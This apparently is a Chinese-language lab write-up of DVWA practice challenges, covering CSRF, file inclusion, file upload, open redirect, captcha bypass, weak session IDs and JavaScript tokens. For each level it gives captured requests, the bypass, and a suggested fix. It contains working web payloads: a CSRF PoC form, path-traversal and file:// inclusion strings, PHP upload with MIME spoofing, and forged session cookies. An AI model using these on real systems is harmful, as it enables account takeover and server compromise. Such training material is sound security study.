一、csrf
1、csrf(low)
限制
复现
GET /vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close
伪造代码
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://ddd.com/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="123456" />
<input type="hidden" name="password_conf" value="123456" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
模仿受害者点击
点击后修改成功
代码
没有token机制
修复
生成token,提交表单
验证token
2、csrf(medium)
限制
复现
GET /vulnerabilities/csrf/?password_new=1qaz1qaz&password_conf=1qaz1qaz&Change=Change HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=medium
Connection: close
构造同域名
启动http服务
模仿受害者点击,此时的Referer,已经包含需要的域名
点击后修改成功
代码
存在Referer验证请求来源,替换同域名即可成功。构造同域名
修复
生成token并验证,提交表单
3、csrf(high)
限制
复现
GET /vulnerabilities/csrf/?password_new=qawwz&password_conf=qawwz&Change=Change&user_token=69371e451b62fe4a6a0275bbdddf1aa5 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/?password_new=qaz&password_conf=qaz&csrf_token=5624d372f71b20d90f329da069411b20f072cdf777de7320afd1de566b1cfc39&Change=Change&user_token=373fbc54c43123e7c30da432d964ab32
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=high
Connection: close
同中等级一样构造同域名
存在Referer验证请求来源,构造同域名
启动http服务
模仿受害者点击,此时的Referer,已经包含需要的域名
点击后修改成功
代码
由首页进入high.php代码页面
如果change参数存在进入验证token步骤
检测disable_authentication是否在$_DVWA数组里,存在则返回true,就直接跳出不会进入下面的if.
如果上面为false就会进入下面的验证token.如果传入的token不等于生成的token,或者不存在token.就提醒token不正确,然后返回到index.php
虽然代码有验证,但是验证是未开启状态
修复
$_DVWA[ 'disable_authentication' ] = true;(禁用认证=对)
$_DVWA[ 'disable_authentication' ] = false;(禁用认证=不禁用)
只需要将禁用认证开启即可
4、csrf(impossible)
代码
不存在csrf原因,添加了输入原密码,并且将原密码做了防注入
二、文件包含
1、文件包含(low)
限制
复现
GET /vulnerabilities/fi/?page=../../phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=low
Connection: close
读取一个不存在的文件,报错显示出路径
直接跳到跟目录读取phpinfo.php(靶场自带文件)
代码
修复
在刚进入的页面做白名单限制,只允许包含这几个文件
if( isset( $file ) ){
$whitelist = array(
'file1.php',
'file2.php',
'include.php',
'file3.php'
);
if (in_array($file, $whitelist)) {
include $file; // 如果在白名单内,正常执行包含文件
} else {
header( 'Location:?page=include.php' );
exit;// 否则结束程序
}
}
2、文件包含(medium)
限制
复现
GET /vulnerabilities/fi/?page=....//....//phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=medium
Connection: close
代码
过滤 ../,为空。
使用 ....//....//绕过
修复
使用白名单限制
3、文件包含(high)
限制
复现
GET /vulnerabilities/fi/?page=file://E:/code/php/DVWA-master/phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/fi/?page=include.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=high
Connection: close
代码
fnmatch() 函数根据指定的模式来匹配文件名或字符串。
从file变量匹配传入的值是否以file开头,如果不是以file开头并且不等于inclide.php就会进入下面的代码。
绕过:只需要成立一个条件,要么是以file开头,要么file变量等于include.php就会跳出代码
修复
白名单yyds
4、文件包含(impossible)
此等级不存在漏洞
将接受的传参进行判断,如果不是include.php、file1.php、file2.php、file3.php这些文件就直接返回错误
三、文件上传
1、文件上传(low)
限制
复现
直接上传1.php(<?php phpinfo();?>)
POST /vulnerabilities/upload/ HTTP/1.1
Host: ddd.com
Content-Length: 420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBoMTirx30PfCVyq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt322mru8fjkglut8qp02asnnb; security=low
Connection: close
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="uploaded"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="Upload"
Upload
------WebKitFormBoundaryqBoMTirx30PfCVyq--
代码
只将接受的文件名和文件路径进行拼接,然后判断是否将文件移动成功
修复
创建白名单,判断文件名后缀是否在白名单内
2、文件上传(medium)
限制
复现
POST /vulnerabilities/upload/ HTTP/1.1
Host: ddd.com
Content-Length: 406
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryci2GkJlwp5BrsYji
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt322mru8fjkglut8qp02asnnb; security=medium
Connection: close
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="uploaded"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="Upload"
Upload
------WebKitFormBoundaryci2GkJlwp5BrsYji--
代码
只判断了类型,没有判断文件后缀
修复
将接受的文件名打散成数组,再去判断数组的最后一个字符是否存在php。
但是黑名单限制并不安全,可以使用php112345...、PHP、Pph、pHp、phP等方式绕过
最新修复.使用白名单方式
3、文件上传(high)
限制
复现
GET /vulnerabilities/upload/fileclude.php?filepath=../../hackable/uploads/2.jpg HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=high; PHPSESSID=0qlcn5rvk554nuugnh67jjn2du
Connection: close
这里代码做的限制比较多,判断了文件名和文件属性,直接上传无法绕过,只能配合文件包含漏洞上传图片马
代码
将上传的文件进行多个判断条件较为苛刻,文件名后缀、文件大小、文件内容等属性。相当于白名单限制。所以漏洞不存在绕过。
修复
此等级不存在上传漏洞,除非利用文件包含来进行绕过
4、文件上传(impossible)
不会造成漏洞原因:
存在upload参数进入token验证。
对文件名及文件进行处理,截取文件后缀判断是否等于jpg、jpeg、png并将后缀小写,判断了文件大小及文件类型,所有条件都成立才会进行上传,否则返回错误
代码
四、url重定向
1、重定向(low)
限制
复现
GET /vulnerabilities/open_redirect/source/low.php?redirect=https://www.baidu.com?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0qlcn5rvk554nuugnh67jjn2du; security=low
Connection: close
页面点击1或2,抓包将原本要跳转到info.php的页面改成https://www.baidu.com,即可跳转到baidu
代码
绕过:只要redirect传参不为空就可以
修复
创建个数组白名单,传参在白名单内就继续跳转,否则返回错误
2、重定向(medium)
限制
复现
GET /vulnerabilities/open_redirect/source/medium.php?redirect=www.baidu.com?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b9tctcusv0410fdsbulugelgnf; security=medium
Connection: close
将redirect后面的参数修改成//www.baidu.com。因为限制了http://和https://。
代码
接受 redirect传参,并且不为空。
判断参数值是否存在http://、https://存在就进入返回错误。不存在就继续执行跳转代码
绕过:比如:https://www.baidu.com。可以直接传入//www.baidu.com也能跳转。因为//没有被限制
修复
增加白名单机制,如果不在白名单就返回500报错。在白名单就继续执行。
3、重定向(high)
限制
复现
GET /vulnerabilities/open_redirect/source/high.php?redirect=https://www.baidu.com/info.php?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b9tctcusv0410fdsbulugelgnf; security=high
Connection: close
在redirect参数加跳转地址,且必须存在info.php
代码
接受redirect参数,并且不为空就进入if,检查info.php在redirect值中是否存在,如果存在就为true,true不等于false,为true。就进入执行,否则返回500报错
代码限制redirect值必须存在info.php才可以。所以直接在info.php后门加跳转的地址即可
修复
使用白名单操作,如果在传参值在白名单内就进入执行,否则返回500报错
4、重定向(impossible)
代码
此等级不存在重定向
原因:做了白名单机制,接受 redirect参数,参数不为空,并且是整数型,只允许跳转到以下几个页面。
如果传入1、2、99之外的值或为空就报错
五、不安全的验证码
1、不安全的验证码(low)
限制
无
复现
POST /vulnerabilities/captcha/ HTTP/1.1
Host: ddd.com
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/captcha/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=n9j8g84sili69vejk04p7er7ge; security=low
Connection: close
step=2&password_new=qwqw&password_conf=qwqw&Change=Change
数据包里显示除了要修改的新密码参数和change参数,所以只有step是表示验证码的。修改密码后默认验证码是1.页面显示验证码不正确。抓包后将step改成2.即可修改密码成功
代码
修改密码根据step的值被分成两部分。
step==1时,recaptcha_check_answer函数,检验用户输入的验证码是否正确,验证通过后服务器返回表单。
step==2时,然后使用提交 post 方法提交修改的密码。服务器仅检查 Change、step 参数来判断用户是否通过了验证,step参数时可以控制的
未修复
2、不安全的验证码()
限制
passed_captcha参数需要存在
复现
POST /vulnerabilities/captcha/ HTTP/1.1
Host: ddd.com
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/captcha/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3ih9uqumo8a8l99hplirb0jsnt; security=medium
Connection: close
step=2&password_new=qqqq&password_conf=qqqq&passed_captcha=qqqq&Change=Change
将验证码字段改成2,在添加字段passed_captcha=qqqq
代码
在low的代码基础上增加一步校验
如果不接受passed_captcha传参,返回不通过验证
未修复
六、Weak Session IDs
1、弱会话(Ⅰ)
限制
无
复现
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=2; security=low; PHPSESSID=l0evfkg4ulratrosaij9g3ifkn
Connection: close
此数据包是登录后的。每次请求dvwaSession都会增加1
payload:dvwaSession=13; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=low
首先浏览器打开登录页面,使用hacker添加url为登录后的页面,选择cookie和对应的value,dvwaSession=13
代码
检查请求方法是否为POST,如果是,则检查是否存在名为“last_session_id”的参数,如果没有就将这个参数设置为0。设置last_session_id递增,并将获取到值保存到dvwaSession的cookie中
修复
将cookie的dvwaSession生成随机32位的16进制字符串
2、弱会话(Ⅱ)
限制
时间戳转换
复现
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=1681713158; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=medium
Connection: close
此时的dvwaSession是以时间戳验证,只要大于当前时间既可以登录成功
代码
如果请求是post请求方式,将cookie设置当前时间的时间戳
修复
将cookie转换为时间戳后在md5加密
3、弱会话(Ⅲ)
限制
md5解密
复现
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=a87ff679a2f3e71d9181a67b7542122c; dvwaSession=989385e9f554a8185354ad11b45a1f74; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=high
Connection: close
将cookie的dvwaSession进行md5加密
代码
未修复
七、JavaScript
1、JavaScript(low)
限制
先rot13加密,在MD5加密
复现
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=l0evfkg4ulratrosaij9g3ifkn; security=low
Connection: close
token=8b479aefbd90795395b3e7089ae0dc09&phrase=success&send=Submit
页面显示输入success就可以成功,但是显示token无效。从数据包发现我们传入的内容是phrass的值,不管传入什么值token都是一样的。
从代码层面分析到需要将传入的success先rot13加密,在MD5加密传给token
代码
如果请求方式是POST就接受token和phrase参数
如果phrase提交的是success,就判断token是不是rot13加密后md5加密的值,是就返回成功,否则token无效
2、javascript(medium)
限制
token需要字符串反转
复现
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=l0evfkg4ulratrosaij9g3ifkn; security=medium
Connection: close
token=XXsseccusXX&phrase=success&send=Submit
和low一样的是需要传入success.并且不管提交的phrase值是什么token的值都不变
代码
从代码分析,是将token值用strrev函数进行字符串反转才会成功,否则token无效。
3、javascript(high)
限制
hash加密、strrev字符串反转
复现
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 97
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=high
Connection: close
token=ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84&phrase=success&send=Submit
提交success后在数据包将加密的token进行一一加密后在提交
1、strrev("success")字符串反转----sseccus
2、hash("sha256", "XX" . sseccus)----7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a
3、hash("sha256", "7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a" . "ZZ")--ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84
代码
当token传入以下加密后的值才可以成功
